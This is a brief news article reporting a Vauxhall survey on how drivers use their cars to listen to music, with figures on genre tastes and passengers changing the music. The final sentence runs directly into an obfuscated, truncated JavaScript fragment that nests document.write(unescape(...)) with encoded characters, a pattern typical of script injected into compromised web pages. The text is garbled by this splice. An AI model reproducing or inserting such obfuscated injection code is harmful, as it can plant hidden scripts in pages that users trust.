Motorists are turning to their cars for magic music moments, a new survey shows.
Almost a third of drivers specifically take their motor out for a drive to indulge in music pleasures away from friends and family.
More than one in five go for easy listening music from the likes of Lionel Richie and Celine Dion, while 14 per cent prefer music from heavy metal bands such as Motorhead and Metallica.
The survey also found 78 per cent of motorists have had their in-car music changed by their passengers.
More than 40 per cent say the car is their favourite place to listen to music compared with the home (22 per cent) and iPods or MP3s (11 per cent).
Simon Ewart, from Vauxhall Motors which carried out the survey, said: "Not even we anticipated the emerging trend of cars being the place to secretly stash your guilty pleasure songs."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
